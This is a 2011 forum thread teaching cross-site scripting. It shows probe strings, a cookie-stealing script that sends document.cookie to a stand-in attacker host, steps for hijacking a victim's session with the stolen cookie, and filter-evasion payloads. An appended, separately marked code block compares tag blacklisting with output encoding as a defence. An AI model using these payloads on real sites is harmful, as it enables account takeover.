Post: XSS - Cross Site Scripting - The Complete Tutorial
12-18-2011, 09:37 PM #1
tokzikate
Gym leader
Introduction to Cross Site Scripting - XSS
Cross site scripting - XSS - is a type of website vulnerability found in web applications. This vulnerability can be exploited by attackers by injecting malicious client-side code, like a JavaScript program, into a victim's web browser, by sending them a URL for example. Using the malicious code, the attacker can steal the victim's credentials, like cookies. XSS vulnerabilities can potentially be used to perform serious, large-scale attacks. XSS attacks are very popular, and vulnerabilities have been found in even the biggest websites, including Google, FBI, AOL and Microsoft. This TuT covers finding XSS vulns, exploiting them, patching them, and then bypassing some of the patching!

Finding Basic XSS Vulnerabilities
Website features that are most vulnerable to XSS are:

  • Search Engines
  • Login Forms
  • Comment Fields

How to find out if a website is vulnerable to XSS:
There are a few ways to find out if a website is vulnerable to XSS:
If you find a Search box on a website: type in:
    <h1>XSSed</h1>

and you get a result like:
[attachment]
then the website is vulnerable.
The next step is to try to inject JavaScript into the search field. Try typing in:
    <script>alert("hi")</script>

If an alert box pops up with "hi" in it, then the site is vulnerable to JavaScript injection.
Let's say that a hacker wanted to steal cookies from the site. He could craft a link using the Search function, to first see if the site saved cookies:
    <a href=javascript:alert(document.cookie);>Click me</a>

This code would get a result like so:
[attachment]
The hacker could then make his own PHP page that saves the cookie, with a code like this:
    <script> document.location = 'https://hackerssiteexample.com/save.cgi?cookie=' + document.cookie; </script>

This code would redirect the user to the site shown, and (with the right code on the site) the hacker can save the cookie!!


Applying the Vulnerabilities

Once you have stolen the cookie, you're probably thinking, "What the **** does this even do?"
Well:
1) You need Firefox.
2) You need to get the Firebug add-on, link:
https://addons.mozilla.org/en-US/firefox/addon/firebug/
3) And finally you need the FireCookie add-on, link:
https://addons.mozilla.org/en-US/firefox/addon/firecookie/
Once you have all that, you navigate to the website you stole a cookie/s from.
You press F12 to open Firebug, or just go "Tools>Web Developer>FireBug>Open Firebug". Click on the "Cookies" tab:
[attachment]
You then find the website you stole the cookie from, edit the cookie, remove the data that's there, and paste in the stolen cookie. Navigate to the website and you're logged in with the account of the user you stole the cookie from!
:fyea:


Patching/Filtering the XSS vulnerability

If you have your own website, and find that it's vulnerable to XSS, you're like :FU:
>:(
But you can patch it!
You can eradicate the vulnerability by filtering out tags from the input.
Tags that NEED to be filtered include:
    <script></script>
    <a href=""></a>

There are more though!


Evading Simple Filtering

You can use other XSS techniques to evade simple filtering. I will list a few here:

    <IMG SRC=javascript:alert('XSS';)> //only works with IE & Opera
    <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
    <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
    <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

You can find many others at:
https://ha.ckers.org/xss.html


Some Useful Resources:
https://www.steve.org.uk/Security/XSS/Tutorial/

Enjoy! =D
Please leave feedback, thank you!

edit: I tried to add pages, but failed miserably :/
You're going to have to put up with spoilers for now ;)


The following 3 users say thank you to tokzikate for this useful post:

Lucid Ghost, ozzy21
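
Added example, not part of the original post: a tag blacklist like the one described under "Patching/Filtering" compared with HTML output encoding, run over probes that appear in the post. The function names and the search-results fragment are hypothetical, constructed for illustration.

```javascript
'use strict';

// Blacklist approach from the post: strip <script> and <a> tags from the input.
function stripBlacklistedTags(input) {
  return input
    .replace(/<\/?script[^>]*>/gi, '')
    .replace(/<\/?a(\s[^>]*)?>/gi, '');
}

// Output encoding: every character that can open markup or close an
// attribute value is turned into an entity before it reaches the page.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical search-results fragment that echoes the query back.
function renderResults(query, sanitize) {
  return '<p>Results for: ' + sanitize(query) + '</p>';
}

// True if the fragment contains any tag besides the wrapper <p>,
// meaning user input was interpreted as markup.
function containsInjectedMarkup(html) {
  const tags = html.match(/<[a-z!\/][^>]*>/gi) || [];
  return tags.some((tag) => !/^<\/?p>$/i.test(tag));
}

// Probes taken from the post (constructed test input, nothing is executed).
const PROBES = [
  '<h1>XSSed</h1>',
  '<script>alert("hi")</script>',
  '<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>',
];

function compare() {
  return PROBES.map((probe) => ({
    probe,
    blacklist: containsInjectedMarkup(renderResults(probe, stripBlacklistedTags)),
    encoded: containsInjectedMarkup(renderResults(probe, escapeHtml)),
  }));
}

console.table(compare());
```

The blacklist only stops the literal `<script>` probe, while encoding on output leaves no injected tag in any case. Setting the `HttpOnly` attribute on the session cookie additionally keeps it out of `document.cookie`.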
12-19-2011, 12:30 AM #2
tokzikate
Gym leader
Updated, Enjoy! =D
12-24-2011, 02:06 AM #3
Originally posted by tokzikate
Updated, Enjoy! =D

To add pages just do
[multipage=Page Name ] Body Text
[multipage=Page #2 ] Page #2 Body Text

Don't put spaces though

Copyright © 2026, NextGenUpdate.
All Rights Reserved.
